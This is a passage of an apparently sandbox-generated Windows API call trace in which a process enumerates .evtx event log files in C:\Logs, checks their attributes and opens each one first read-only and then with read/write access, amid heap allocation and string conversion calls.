lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.789] CloseHandle (hObject=0x348) returned 1 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.790] AreFileApisANSI () returned 1 [0086.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0086.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 57 [0086.790] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0086.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.790] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0086.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0086.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0086.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0086.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0086.791] AreFileApisANSI () returned 1 [0086.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpUsedDefaultChar=0x0) returned 65 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0086.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.791] AreFileApisANSI () returned 1 [0086.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82208 [0086.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 65 [0086.792] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.792] GetFileType (hFile=0x348) returned 0x1 [0086.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0086.792] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.792] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.792] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.792] CloseHandle (hObject=0x348) returned 1 [0086.793] AreFileApisANSI () returned 1 [0086.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x828c8 [0086.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x828c8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 65 [0086.793] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.793] GetFileType (hFile=0x348) returned 0x1 [0086.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x828c8 | out: hHeap=0x20000) returned 1 [0086.793] CloseHandle (hObject=0x348) returned 1 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0086.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0086.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0086.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0086.794] AreFileApisANSI () returned 1 [0086.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82ef8 [0086.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82ef8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 65 [0086.794] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0086.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.794] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0086.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0086.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.795] AreFileApisANSI () returned 1 [0086.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpUsedDefaultChar=0x0) returned 62 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0086.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.796] AreFileApisANSI () returned 1 [0086.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0086.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ecf0 [0086.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=62 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 62 [0086.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.796] GetFileType (hFile=0x348) returned 0x1 [0086.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0086.796] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.796] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.796] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.796] CloseHandle (hObject=0x348) returned 1 [0086.943] AreFileApisANSI () returned 1 [0086.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0086.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0086.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 62 [0086.956] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.959] GetFileType (hFile=0x424) returned 0x1 [0086.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0086.959] CloseHandle (hObject=0x424) returned 1 [0086.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.959] HeapFree (in: 